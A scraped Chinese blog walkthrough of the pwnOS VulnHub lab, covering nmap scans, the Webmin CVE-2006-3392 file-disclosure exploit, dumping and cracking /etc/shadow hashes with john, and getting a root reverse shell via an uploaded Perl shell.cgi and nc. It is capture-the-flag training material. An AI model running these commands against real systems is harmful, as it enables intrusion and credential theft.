当前位置: 首页 > news >正文

网站服务器维护工具公关公司提供的服务有哪些

网站服务器维护工具,公关公司提供的服务有哪些,百度商桥代码怎么加到网站上,自学网ps教程新手入门文章目录 1.信息收集2.漏洞测试3.爆破hash4.提权 首先拿到一台靶机#xff0c;就需要知道靶机的各种信息#xff08;IP地址#xff0c;开放端口#xff0c;有哪些目录#xff0c;什么框架#xff0c;cms是什么#xff0c;网页有什么常见的漏洞#xff0c;如sql注入就需要知道靶机的各种信息IP地址开放端口有哪些目录什么框架cms是什么网页有什么常见的漏洞如sql注入命令执行文件包含等…及各种收集工具的使用 1.信息收集 拿靶机的IP地址,一般有以下三种 arp-scan -l netdiscover -s high -h 10.10.10.0/24 nmap -sn 10.10.10.0/24我的靶机IP地址是10.10.10.14得到IP地址后扫描开放的端口 ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# nmap -p- 10.10.10.14 --min-rate 10000 //扫描1-65535的所有端口 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 10000/tcp open snet-sensor-mgmtudp扫描 ┌──(root㉿kali)-[~] └─# nmap -sU 10.10.10.14 --min-rate 10000 PORT STATE SERVICE 137/udp open netbios-ns 162/udp closed snmptrap 1033/udp closed netinfo-local 2002/udp closed globe 19141/udp closed unknown 30365/udp closed unknown 37783/udp closed unknown端口服务扫描 ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# nmap -sT -sV -O 10.10.10.14 Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-22 00:50 EDT Nmap scan report for 10.10.10.14 Host is up (0.069s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME) 10000/tcp open http MiniServ 0.01 (Webmin httpd) MAC Address: 00:0C:29:5E:18:C9 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6.22 OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.21 seconds通过扫描得到80端口是apache服务2.2.4版本139和445是smb服务10000端口是webmin框架等下可以搜一下相关漏洞 nmap常见漏洞扫描 ┌──(root㉿kali)-[~] └─# nmap --scriptvuln -p22,80,139,445,10000 10.10.10.14 Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-22 00:51 EDT Nmap scan report for 10.10.10.14 Host is up (0.0014s latency).PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldnt find any CSRF vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http servers resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2007-6750 | http-enum: | /icons/: Potentially interesting directory w/ listing on apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6 | /index/: Potentially interesting folder |_ /php/: Potentially interesting directory w/ listing on apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6 |_http-dombased-xss: Couldnt find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-stored-xss: Couldnt find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled 139/tcp open netbios-ssn 445/tcp open microsoft-ds 10000/tcp open snet-sensor-mgmt | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using ..%01 sequences | to bypass the removal of ../ directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure | http://www.exploit-db.com/exploits/1997/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2006-3392 MAC Address: 00:0C:29:5E:18:C9 (VMware)Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)Nmap done: 1 IP address (1 host up) scanned in 321.72 seconds分析80端口有dos攻击有/icons,/index,/php三个目录;10000端口有一个CVE-2006-3392任意文件读取漏洞 访问8010000端口看看有什么东西 80 提示我们点击next http://10.10.10.14/index1.php?helptrueconnecttrue http://10.10.10.14/index2.php?name123leveln00bsubmitPleaseHelp%21 在这个页面下尝试加单引号闭合然而并没有报错将参数改为/etc/passwd也没有什么用 php页面有一个phpmyadmin但是需要密码 10000端口应该是后台登陆页面 2.漏洞测试 在kali中searchsploit是一个很的漏洞库可以在里面搜各种poc ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# searchsploit webmin ------------------------------------------------------ ---------------------------------Exploit Title | Path ------------------------------------------------------ --------------------------------- DansGuardian Webmin Module 0.x - edit.cgi Directory | cgi/webapps/23535.txt phpMyWebmin 1.0 - target Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - window.php Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Sp | linux/remote/22275.pl Webmin 0.x - RPC Privilege Escalation | linux/remote/21765.pl Webmin 0.x - Code Input Validation | linux/local/21348.txt Webmin 1.5 - Brute Force / Command Execution | multiple/remote/746.pl Webmin 1.5 - Web Brute Force (CGI) | multiple/remote/745.pl Webmin 1.580 - /file/show.cgi Remote Command Execut | unix/remote/21851.rb Webmin 1.850 - Multiple Vulnerabilities | cgi/webapps/42989.txt Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb Webmin 1.910 - Package Updates Remote Command Execu | linux/remote/46984.rb Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh Webmin 1.920 - Unauthenticated Remote Code Execution | linux/remote/47230.rb Webmin 1.962 - Package Updates Escape Bypass RCE (M | linux/webapps/49318.rb Webmin 1.973 - run.cgi Cross-Site Request Forgery ( | linux/webapps/50144.py Webmin 1.973 - save_user.cgi Cross-Site Request For | linux/webapps/50126.py Webmin 1.984 - Remote Code Execution (Authenticated) | linux/webapps/50809.py Webmin 1.996 - Remote Code Execution (RCE) (Authentic | linux/webapps/50998.py Webmin 1.x - HTML Email Command Execution | cgi/webapps/24574.txt Webmin 1.290 / Usermin 1.220 - Arbitrary File Dis | multiple/remote/1997.php Webmin 1.290 / Usermin 1.220 - Arbitrary File Dis | multiple/remote/2017.pl Webmin 1.920 - rpc.cgi Remote Code Execution (Met | linux/webapps/47330.rb ------------------------------------------------------ --------------------------------- Shellcodes: No Results┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# searchsploit -m 2017.pl Exploit: Webmin 1.290 / Usermin 1.220 - Arbitrary File DisclosureURL: https://www.exploit-db.com/exploits/2017Path: /usr/share/exploitdb/exploits/multiple/remote/2017.plCodes: CVE-2006-3392Verified: True File Type: Perl script text executable Copied to: /root/kali/vulnhub/pwnOS/2017.pl使用perl ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# perl 2017.pl Usage: 2017.pl url port filename target //使用方法 TARGETS are0 - HTTP 1 - HTTPS Define full path with file name Example: ./webmin.pl blah.com 10000 /etc/passwd┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# perl 2017.pl 10.10.10.14 10000 /etc/passwd 0 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl cuz I hate PHP! Attacking 10.10.10.14 on port 10000! FILENAME: /etc/passwdFILE CONTENT STARTED----------------------------------- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash obama:x:1001:1001::/home/obama:/bin/bash osama:x:1002:1002::/home/osama:/bin/bash yomama:x:1003:1003::/home/yomama:/bin/bash可以读取到/etc/passwd文件读取/etc/shadow试试,也可以那就拿加密密码去爆破 ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# perl 2017.pl 10.10.10.14 10000 /etc/shadow 0 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl cuz I hate PHP! Attacking 10.10.10.14 on port 10000! FILENAME: /etc/shadowFILE CONTENT STARTED----------------------------------- root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7::: daemon:*:14040:0:99999:7::: bin:*:14040:0:99999:7::: sys:*:14040:0:99999:7::: sync:*:14040:0:99999:7::: games:*:14040:0:99999:7::: man:*:14040:0:99999:7::: lp:*:14040:0:99999:7::: mail:*:14040:0:99999:7::: news:*:14040:0:99999:7::: uucp:*:14040:0:99999:7::: proxy:*:14040:0:99999:7::: www-data:*:14040:0:99999:7::: backup:*:14040:0:99999:7::: list:*:14040:0:99999:7::: irc:*:14040:0:99999:7::: gnats:*:14040:0:99999:7::: nobody:*:14040:0:99999:7::: dhcp:!:14040:0:99999:7::: syslog:!:14040:0:99999:7::: klog:!:14040:0:99999:7::: mysql:!:14040:0:99999:7::: sshd:!:14040:0:99999:7::: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7::: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7::: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7::: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7::: 3.爆破hash john 是一个密码破解工具用于破解密码哈希值。它通常用于测试系统的密码强度评估系统安全性或者在授权测试中尝试获取未授权的访问 ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# john hash --wordlist/usr/share/wordlists/rockyou.txt Warning: detected hash type md5crypt, but the string is also recognized as md5crypt-long Use the --formatmd5crypt-long option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 4 password hashes with 4 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3]) Will run 4 OpenMP threads Press q or Ctrl-C to abort, almost any other key for status h4ckm3 (vmware) OK,爆破出VMware密码尝试ssh登陆 ┌──(root㉿kali)-[~] └─# ssh vmware10.10.10.14 Unable to negotiate with 10.10.10.14 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss//SSH 客户端与 SSH 服务器之间的密钥交换算法不匹配引起的 ┌──(root㉿kali)-[~] └─# ssh -oHostKeyAlgorithmsssh-dss vmware10.10.10.14 The authenticity of host 10.10.10.14 (10.10.10.14) cant be established. DSA key fingerprint is SHA256:r69najdUdsNI77F8/FCC9zwpVPk1rzzEdT5znXT/Lo. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 10.10.10.14 (DSA) to the list of known hosts. vmware10.10.10.14s password: Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jun 20 14:35:37 2008 vmwareubuntuvm:~$ id uid1000(vmware) gid1000(vmware) groups4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),111(lpadmin),112(admin),1000(vmware)4.提权 提权主要从内核版本suid自动任务sudo -l vmwareubuntuvm:~$ whoami vmware vmwareubuntuvm:~$ find / -perm -us -type f 2/dev/null /usr/bin/traceroute6.iputils /usr/bin/sudo /usr/bin/mtr /usr/bin/passwd /usr/bin/smbumount /usr/bin/chfn /usr/bin/sudoedit /usr/bin/newgrp /usr/bin/arping /usr/bin/gpasswd /usr/bin/smbmnt /usr/bin/at /usr/bin/chsh /usr/sbin/pppd /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/apache2/suexec /bin/su /bin/umount /bin/ping /bin/ping6 /bin/check-foreground-console /bin/fusermount /bin/mount /sbin/mount.cifs /sbin/umount.cifs /lib/dhcp3-client/call-dhclient-script vmwareubuntuvm:~$ cat /etc/cron* cat: /etc/cron.d: Is a directory cat: /etc/cron.daily: Is a directory cat: /etc/cron.hourly: Is a directory cat: /etc/cron.monthly: Is a directory # /etc/crontab: system-wide crontab # Unlike any other crontab you dont have to run the crontab # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.SHELL/bin/sh PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command 17 * * * * root cd / run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.monthly ) vmwareubuntuvm:~$ sudo -l [sudo] password for vmware: Sorry, user vmware may not run sudo on ubuntuvm. vmwareubuntuvm:~$ uname -a Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux在/var目录下发现webmin是具有root权限的所以我们在利用2017.pl时可以直接读取/etc/shadow文件也就是说如果通过漏洞执行反弹shell时反弹的是root因为是root权限执行的呀 OK kali中自带有webshell脚本在/usr/share/webshells/perl/perl-reverse-shell.pl将perl-reverse-shell.pl,复制粘贴位shell.cgi后缀的然后vim修改里面的IP为本地IP 为什么是perl呢因为webmin是perl语言写的如果使用.pl后缀shell反弹不成功所以改成cgi后缀的可执行文件 靶机下载 python3 -m http.server 8888 靶机cd到家目录 vmwareubuntuvm:/var$ cd /home/vmware/ vmwareubuntuvm:~$ wget http://10.10.10.10:8888/shell.cgi通过2017.pl执行shell文件 ┌──(root㉿kali)-[~/kali/vulnhub/pwnOS] └─# perl 2017.pl 10.10.10.14 10000 /home/vmware/shell.cgi 0 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl cuz I hate PHP! Attacking 10.10.10.14 on port 10000! FILENAME: /home/vmware/shell.cgiFILE CONTENT STARTED----------------------------------- Browser IP address appears to be: 10.10.10.10p┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.10.10] from (UNKNOWN) [10.10.10.14] 5664601:16:57 up 3:37, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT vmware pts/0 10.10.10.10 00:40 47.00s 0.10s 0.10s -bash Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux uid0(root) gid0(root) / /usr/sbin/apache: cant access tty; job control turned off # id uid0(root) gid0(root)
http://www.w-s-a.com/news/274970/

相关文章:

  • 健康资讯网站模板网页价格表
  • 2008发布asp网站宝安建网站的公司
  • 郑州市城市建设管理局网站制作公司网站 优帮云
  • 网站开发 瀑布结构普陀网站建设
  • 12380网站建设情况汇报plone vs wordpress
  • c 网站开发数据库连接与wordpress类似的都有哪些
  • 状元村建设官方网站长春做网站seo的
  • 做金融资讯网站需要哪些牌照海珠营销型网站制作
  • 学做网站需要买什么书手机网络
  • 寻找做电影网站团队合作西宁网站建设君博首选
  • 兴仁县城乡建设局网站爱站关键词查询
  • 漳州网站建设公司推荐wordpress更改主机
  • c2c商城网站建设方案英文网站注册
  • 电子商务网站的运营一般需要做哪些准备宣传片拍摄思路
  • 网站建设网页制作百度怎么做自己网站
  • 建设设计网站公司巴州建设局网站
  • 淘宝建设网站的好处韶关市网站建设招标
  • 佛山高端网站免费招聘网站建设
  • 申请网站就是做网站吗wordpress tag 优化
  • 建站系统排行榜菏泽机关建设网站
  • 网站群建设费用科技通信网站模板下载
  • 网站开发的流程是怎样的自己做自媒体在哪个网站比较好
  • 网站的html代码在哪网页线上开发制作
  • 免费商用自媒体图片网站做网站好的公司有哪些
  • 阿雷网站建设公司中国建筑考试网官网首页
  • 厦门网站制作网页无法跳转到建设银行网站
  • 怎么建设自己网站简述网页布局的几种方法
  • 软文营销文案100篇如何优化搜索引擎的搜索功能
  • 做网站创意杭州家具网站建设方案
  • 福州seo网站推广优化乐清建网站